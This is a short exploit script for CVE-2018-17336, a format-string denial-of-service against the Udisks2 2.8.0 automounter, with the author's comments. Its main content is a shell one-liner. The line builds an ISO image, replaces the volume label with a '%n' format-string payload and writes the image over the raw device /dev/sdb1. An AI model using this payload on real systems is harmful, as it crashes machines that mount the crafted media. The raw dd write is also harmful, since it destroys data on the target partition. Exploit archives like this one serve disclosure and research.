# # CVE-2018-17336 # https://oxasploits.com/posts/exploit-archive-partial-disclosure/ # Author: Marshall Whittaker / oxagast # oxagast@oxasploits.com # Udisks2 automounter 2.8.0 DOS / privesc maybe possible but not implemented # Tried but could not find a filesystem with a label long enough, except for NTFS, # but NTFS is strictly unicode, and would require significatly more effort to work # around. # # Cuz guuuuuuuurlllll... it's a mistake to mount this # How about you mount me instead? genisoimage -V "AAAAAAAA" -o dos.iso /etc/passwd && dd if=dos.iso | sed -e 's/AAAAAAAA/%n%n%n%n/g' | dd of=/dev/sdb1